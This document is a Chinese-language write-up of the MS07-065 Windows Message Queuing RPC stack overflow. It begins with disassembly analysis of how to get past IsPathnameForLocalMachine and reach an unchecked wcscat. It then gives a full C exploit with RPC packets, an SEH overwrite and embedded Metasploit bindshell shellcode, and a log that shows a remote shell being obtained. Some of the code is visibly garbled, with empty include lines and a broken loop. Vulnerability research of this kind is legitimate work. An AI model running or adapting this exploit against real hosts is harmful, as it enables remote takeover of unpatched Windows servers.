.text:6B2178D2                 jnz     short loc_6B2178EC     ; 这里有个判断

.text:6B2178EC                 cmp     [ebp-1Ch], ebx    ; 这里有个判断
.text:6B2178EF                 jz      short loc_6B217906
.text:6B2178F1                 lea     eax, [ebp-144h]     ; 在栈上
.text:6B2178F7                 push    eax             ; Dest
.text:6B2178F8                 push    esi             ; Str   我们传入的参数
.text:6B2178F9                 call    ?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z ; ReplaceDNSNameWithNetBiosName(ushort const *,ushort *)

========== 这是聪明的分割线 ============

要走到 ReplaceDNSNameWithNetBiosName ,就需要先绕过 IsPathnameForLocalMachine 这个函数。我在绕过这个函数上走了很多弯路，花了许多功夫。

看看IsPathnameForLocalMachine函数:

中间分析过程很多，这里我就拿重要的说

mov     eax, offset sub_6B25D54C
call    __EH_prolog
sub     esp, 204h
push    ebx
push    esi
lea     eax, [ebp+String1]
push    edi
push    eax             ; Dest
push    [ebp+Source]    ; Source
call    ?ExtractMachineName@@YAXPBGPAG@Z ; ExtractMachineName(ushort const *,ushort *)
mov     eax, [ebp+arg_4]
pop     ecx
pop     ecx
mov     esi, ds:__imp__CompareStringW@24 ; CompareStringW(x,x,x,x,x,x)
and     dword ptr [eax], 0
push    0FFFFFFFFh      ; cchCount2
push    ?g_szMachineName@@3PAGA ; lpString2
lea     eax, [ebp+String1]
mov     edi, 800h
push    0FFFFFFFFh      ; cchCount1
push    eax             ; lpString1
push    1               ; dwCmpFlags
push    edi             ; Locale
call    esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec     eax
dec     eax
jnz     short loc_6B2344E9

ExtractMachineName(ushort const *,ushort *) 这个函数把\x5c 就是斜杠前的名字，就是机器名拷贝到某处，所以我们的传入参数里要有斜杠。

然后CompareStringW(x,x,x,x,x,x) 函数，把我们传入的斜杠前的那部分和机器名比较，这里机器名是通过
push ?g_szMachineName@@3PAGA ; lpString2
取得的，所以是一个定值。

对比完后，我们要让返回值不能为2，因为要跳转到下面的地方：

loc_6B2344E9:
lea     eax, [ebp+String1]
push    2Eh             ; Ch
push    eax             ; Str
call    ds:__imp__wcschr
pop     ecx
test    eax, eax
pop     ecx
jz      loc_6B2345DD

这里会把刚才斜杠前的那部分拿来比较，看中间有没有点，我们要让跳转条件非真，所以我们的传入参数中要带一个“.” 就是\x2e

然后我们控制流程来到

push    ?g_szMachineName@@3PAGA ; Str
mov     ebx, ds:__imp__wcslen
call    ebx ; __imp__wcslen
pop     ecx
push    eax             ; cchCount2
mov     eax, ?g_szMachineName@@3PAGA ; ushort * g_szMachineName
push    eax             ; lpString2
push    eax             ; Str
call    ebx ; __imp__wcslen
pop     ecx
push    eax             ; cchCount1
lea     eax, [ebp+String1]
push    eax             ; lpString1
push    1               ; dwCmpFlags
push    edi             ; Locale
call    esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec     eax
dec     eax
jnz     loc_6B2345DD

这里再次把机器名和我们传入的参数比较了一次, 这时候要让跳转条件不成立

流程继续走到

.text:6B234531                 push    ?g_szMachineName@@3PAGA ; Str
.text:6B234537                 call    ebx ; __imp__wcslen
.text:6B234539                 cmp     [ebp+eax*2+String1], 2Eh
.text:6B234542                 pop     ecx
.text:6B234543                 jnz     loc_6B2345DD
.text:6B234549                 mov     eax, ?g_szComputerDnsName@@3V?$AP@G@@A ; AP g_szComputerDnsName
.text:6B23454E                 test    eax, eax
.text:6B234550                 jz      short loc_6B234570
.text:6B234552                 lea     ecx, [ebp+String1]
.text:6B234558                 push    ecx             ; Str2
.text:6B234559                 push    eax             ; Str1
.text:6B23455A                 call    ds:__imp___wcsicmp  ;比较字符串
.text:6B234560                 pop     ecx
.text:6B234561                 test    eax, eax
.text:6B234563                 pop     ecx
.text:6B234564                 jnz     short loc_6B234570   ; 这里不能跳转
.text:6B234566                 mov     ecx, [ebp+arg_4]
.text:6B234569                 push    1
.text:6B23456B                 pop     eax
.text:6B23456C                 mov     [ecx], eax
.text:6B23456E                 jmp     short loc_6B2345DF

注意这里

mov     eax, ?g_szComputerDnsName@@3V?$AP@G@@A ; AP g_szComputerDnsName
test    eax, eax
jz      short loc_6B234570

这个dns name是从机器中取的

.text:6B234552                 lea     ecx, [ebp+String1]
.text:6B234558                 push    ecx             ; Str2
.text:6B234559                 push    eax             ; Str1
.text:6B23455A                 call    ds:__imp___wcsicmp

然后马上比较两个串是否相同。

根据我们的流程需要，最后要走到

mov     ecx, [ebp+arg_4]
push    1
pop     eax
mov     [ecx], eax
jmp     short loc_6B2345DF

然后这个天杀的 IsPathnameForLocalMachine 就总算返回为真了，而且我们同时绕过了以下两处的判断:

.text:6B2178CF                 cmp     eax, ebx      ; 比较ispath函数的返回值
.text:6B2178D1                 pop     ecx
.text:6B2178D2                 jnz     short loc_6B2178EC     ; 这里有个判断

.text:6B2178EC                 cmp     [ebp-1Ch], ebx    ; 这里有个判断
.text:6B2178EF                 jz      short loc_6B217906

从而让函数流程顺利的执行到了 ReplaceDNSNameWithNetBiosName

小结下绕过 IsPathnameForLocalMachine 的条件：
1. 要发送个目标机器的dnsname 加上一个斜杠 \
2. 要是unicode字符串发送dnsname

实际上从 ReplaceDNSNameWithNetBiosName 这个函数的名字也可以看出来，是要把DNS name替换为机器名。

同时也可以看出来这个漏洞的利用条件：需要知道目标机器的dnsname。
一般如果机器在域里面，那就是域后缀。
如下图：

我的机器名是： a-dda41398f44f4
DNS后缀是： .fuck

注意这个“.”很重要，在触发条件中是一定要的。

========= 这是要抓狂的分割线 =================

现在回过头来看 ReplaceDNSNameWithNetBiosName 的代码：

push    esi
push    5Ch             ; Ch
push    [esp+8+Str]     ; Str
call    ds:__imp__wcschr
pop     ecx
mov     esi, eax
pop     ecx
push    ?g_szMachineName@@3PAGA ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscpy
pop     ecx
pop     ecx
push    esi             ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscat

就是把 \ 后面的字符串，wcscat到机器名后面，而这个拷贝发生在栈上，没有做长度检查，发生了栈溢出。

最后我使用覆盖seh 的方法利用成功发送超过2000 bytes字节的stub，保证覆盖到栈底触发异常，然后call ebx执行shellcode

下面是一个装B的exploit，只适用于我的机器（机器名是a-dda41398f44f4 , dns 后缀是.fuck ），如果你要修改，需要考虑到机器名的不同带来的影响，要重新计算payload长度值. 为啥说这是装B的exploit呢，因为明明有更清晰的exploit写法我不写，要写个可以忽悠很多人的。所以说大家要是以前看到过这种exploit写法又看不懂，那不要灰心，那个人只是和我一样在装B而已！

Exploit运行效果：

Shellcode 使用exitthread退出线程，则可以反复溢出，如果使用seh退出，则会反复执行你的shellcode

======== 这是装B的分割线 ===============

/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org

  you should know the dnsname of target to trigger this vuln
  the service runs on port 2103/2105/2107

D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------

[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!

D:\soft\develop\MyProjects\temp\Debug>

D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK

D:\>

*/
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")

// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };

// RPC Request  Opnum: 0x06
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};

char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

void usage(char *argv) {
   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
   printf("          %s -h host [-p port]\n",argv);
   printf(" Targets:\n");
   exit(1);
}

/************* TCP connect *************************/

void Disconnect(SOCKET s);

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((short)port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

void Disconnect(SOCKET s)
{
    closesocket(s);
    WSACleanup();
}

/****************************************************/

int main(int argc, char * argv[]){

   unsigned char * target = NULL;
   int port = 2103;
   int i;

   int  ret;
   char buffer[6000] = {0};
   SOCKET  s;
   WSADATA WSAData;

   printf("--------------------------------------------------------------------------\n");
   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
   printf("-== code by axis@ph4nt0m ==-\n");
   printf("-== Http://www.ph4nt0m.org ==-\n");
   printf("-== Tested against Windows 2000 server SP4 ==-\n");
   printf("--------------------------------------------------------------------------\n\n");

    if (argc==1) usage(argv[0]); //Handle parameters
     for(i=1;i      if ( (argv[i][0]=='-') ) {
         switch (argv[i][1]) {
         case 'h':
            target=(unsigned char *)argv[i+1];
            break;
         case 'p':
            if (strcmp(argv[i+1],"2103")==0) {
               printf("[+] Attacking default port 2103\n");
            } else {
               port=atoi(argv[i+1]);
            }
            break;
         default:
            printf("[-] Invalid argument: %s\n",argv[i]);
            usage(argv[0]);
            break;
         }
         i++;
      } else usage(argv[0]);
     }

/********************** attack payload ***************************/
         if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
         {
            fprintf(stderr, "[-] WSAStartup failed.\n");
            WSACleanup();
            exit(1);
         }

         //Sleep(1200);

         s = Make_Connection((char *)target, port, 10);
         if(s<0)
         {
            fprintf(stderr, "[-] connect err.\n");
            exit(1);
         }

        //Send our evil Payload
        printf("[*]Sending our Payload, Good Luck! ^_^\n");

        printf("[*]Sending RPC Bind String!\n");
        send(s, bind_str, sizeof(bind_str), 0);

        Sleep(1000);

        printf("[*]Sending RPC Request Now!\n");
        memset(buffer, '\x41', sizeof(buffer));  // fil the buffer to trigger seh
        send(s, request_1, sizeof(request_1), 0);
        send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
        send(s, request_2, sizeof(request_2), 0);


        Sleep(100);

        memset(buffer, 0, sizeof(buffer));
        ret = recv(s, buffer, sizeof(buffer)-1, 0);
        //printf("recv: %s\n", buffer);

        Disconnect(s);

        return 0;
}